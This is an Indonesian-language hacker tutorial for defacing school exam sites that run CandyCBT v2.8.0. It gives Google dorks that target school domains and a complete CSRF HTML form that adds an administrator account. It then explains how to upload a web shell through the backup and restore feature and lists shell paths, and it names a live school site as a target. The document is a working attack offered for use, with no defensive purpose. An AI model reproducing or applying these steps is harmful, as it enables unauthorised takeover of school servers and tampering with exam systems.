CandyCBT v2.8.0 r !!!add admin




Heyoyo bree bertemu dengan saya lagi kali ini gua upload cara deface candy CBT iya yang biasanya di sebut Computer Basics Test tu loh buat ujian sekolah gak tau gak usah sekolah bree: (admin

Langsung saja ke tutornya

1.Dork:

 ~> "Responsive Image" + "Support" intitle:Login

~> intex support by candy cbt v2.8.0

~> inurl: login CBT site:.sch.id


2.shell banyak di google terserah mau pake yng mana 
3.Crsf add mimin

<html>
<head></head>
<body>
<form action="https://mantanlucnut.cok/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>


Pertama kalian dorking dulu pakek dork di atas bree yang dah gua siapin



Nahh kalian pilih salah satu targetnya bree  ingat bree pilih yang v2.8. Karena ini tutorialnya untuk v2.8.  
Disini gua udah punya target

Nahh ini live target saya bree kalian tinggal login caranya site.sch.id/admin/login.php 
 
Terus kalian salin Crsf add mimin tadi kalian tinggal edit di bagian ini

<form action="https://mantanlucnut.cok/admin/?pg=pengawas" method="post" 

nahh kalo sudah kalian tinggal simpan berformat HTML bree

Terus kalian cari filenya kalian simpan di mana terus kalian buka dengan chrome/browser



Nahh nanti tampilan gambar seperti ini bree kalian tinggal isi user sama pass nya sesuai keinginan kalian kalok udah selesai isi user sama pass nya tinggal kalian simpan nanti otomatis masuk ke halaman login web target tersebut bree


Nahh kalian tinggal masukkan user dan pass yang kalian bikin bree ingat jangan sampai salah bree:) 


Nahh nangi otomatis masuk ke dashboard mimin terserah kalian mau apain web kalian:) 


Jika kalian mau upload shell kalian tinggal pergi ke pengaturan cari yang namanya backup & restore. 

untuk path/tempat shell, ada di /admin/
Contoh : https://sekolahku.sch.id/admin/yourshell.php
https://sekolahku.sch.id/admin/[patch]/yourshell.php

Live target
http://www.sman2tumijajar.com/login.php

Mungkin skian kalo ada salah moon maap

Thnks
./EcchiExploit

Komentar